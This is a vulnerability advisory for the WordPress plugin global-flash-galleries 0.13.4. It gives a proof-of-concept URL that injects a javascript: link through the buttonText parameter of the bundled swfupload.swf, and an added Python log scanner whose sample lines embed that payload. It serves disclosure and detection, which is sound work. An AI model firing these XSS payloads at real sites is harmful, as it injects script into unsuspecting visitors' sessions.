wp-plugin : global-flash-galleries

Plugin Details
Plugin Name: wp-plugin : global-flash-galleries
Affected Version : 0.13.4 (and most probably lower versions, if any)
Vulnerability : Components with Known Vulnerabilities (reflected cross-site scripting through the buttonText parameter of the bundled SWFUpload swfupload.swf)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/plugins/globalflashgalleries/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E

The query string decodes to buttonText=<a href="javascript:alert(1)">Click For XSS <font size="16"></a>. The bundled swfupload.swf renders buttonText as HTML inside the Flash upload button, so attacker-supplied markup, here a link with a javascript: URL, is injected and runs in the origin of the WordPress site. Because the .swf is served as a static file straight out of the plugin directory, WordPress authentication, nonces and PHP-level output escaping are never involved: the request needs no login, and a victim only has to open the crafted URL in a browser with Flash Player enabled. To verify an installation is no longer exposed, confirm that the plugin is newer than 0.13.4 and that the swfupload.swf path above is no longer reachable with a buttonText parameter.
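The following is an added detection example, not code from the advisory or from the plugin. It scans web-server access log lines in Combined Log Format for requests to the vulnerable swfupload.swf path whose buttonText parameter, once URL-decoded, carries HTML or a javascript: URL, which is exactly what the PoC above looks like in a log. The log lines embedded in the block are constructed for the example (the client address and timestamps are made up), and the double-decoding step is an assumption added to catch double-encoded payloads.

```python
"""Flag access-log requests that carry HTML in SWFUpload's buttonText parameter.

Added example for the global-flash-galleries advisory; not part of the plugin.
Works on Combined Log Format lines (Apache/nginx default access log).
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path suffix of the vulnerable component inside the plugin directory
# (taken from the PoC URL in the advisory).
SWFUPLOAD_PATH = "/js/swfupload/swfupload.swf"

# Anything that looks like an HTML tag or a javascript: URL in buttonText.
HTML_MARKER = re.compile(r"<[a-zA-Z/!]|javascript:", re.IGNORECASE)

# Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines: one PoC hit, one double-encoded variant,
# one benign request to the same .swf, and one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/May/2014:10:15:02 +0000] "GET /wordpress/wp-content/plugins/'
    'globalflashgalleries/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:'
    'alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E HTTP/1.1" 200 12345',
    '203.0.113.7 - - [25/May/2014:10:15:09 +0000] "GET /wordpress/wp-content/plugins/'
    'globalflashgalleries/js/swfupload/swfupload.swf?buttonText=%253Cb%253Ex%253C/b%253E'
    ' HTTP/1.1" 200 12345',
    '198.51.100.4 - - [25/May/2014:10:16:30 +0000] "GET /wordpress/wp-content/plugins/'
    'globalflashgalleries/js/swfupload/swfupload.swf?buttonText=Upload HTTP/1.1" 200 12345',
    '198.51.100.4 - - [25/May/2014:10:16:31 +0000] "GET /wordpress/index.php?buttonText=%3Cb%3E'
    ' HTTP/1.1" 200 8000',
]


def decoded_button_text(target):
    """Return the decoded buttonText value for a request to swfupload.swf, else None.

    parse_qs already URL-decodes once; the extra unquote() is an assumption made
    here so that a double-encoded payload (%253C -> %3C -> <) is also exposed.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SWFUPLOAD_PATH):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("buttonText")
    if not values:
        return None
    return unquote(values[0])


def scan_log(lines):
    """Return one dict per log line whose buttonText contains HTML or javascript:."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a Combined Log Format line; skip rather than guess
        text = decoded_button_text(match["target"])
        if text is None or not HTML_MARKER.search(text):
            continue
        hits.append(
            {
                "ip": match["ip"],
                "ts": match["ts"],
                "status": int(match["status"]),
                "buttonText": text,
            }
        )
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} buttonText={hit['buttonText']!r}")
```

A 200 status on such a hit means the server still serves the .swf, so the page delivered the payload; a 404 means the file is gone and the entry is only a probe. Run the same scan over real logs by replacing SAMPLE_LOG with the lines of the access log.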


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : 2014-05-25
CVE Number :
Plugin Description :
Global Flash Gallery plugin can help you to create fast and perfectly wonderful and unique galleries of great albums, photos, cards and other images. Global Flash Galleries plugin is easy and convenient for use. It's captivating and beautiful to execute in practice. Ready-made harmonic color layouts are offered in this plug-in. It is possible to preview a gallery created from several albums in a convenient mode of slide show (full size) or in thumbnails (streaming tape). It's easy with Global Flash Galleries to create different galleries from numerous grouped albums even if you don't have much experience in it. There are many various and apprehensible settings and styles with which you can easily change the size of images preserving their original proportion and put the required tags. The plug-in navigation is made at the highest levels and has a broad range of demonstration effects which are easy and plain to comprehend. The excellent functional capabilities of the plug-in will help to create a really peculiar and distinctive collection of galleries. Please find in the Screenshots section the short descriptions of every gallery. Demo: http://flash-gallery.com/wordpress-plugin/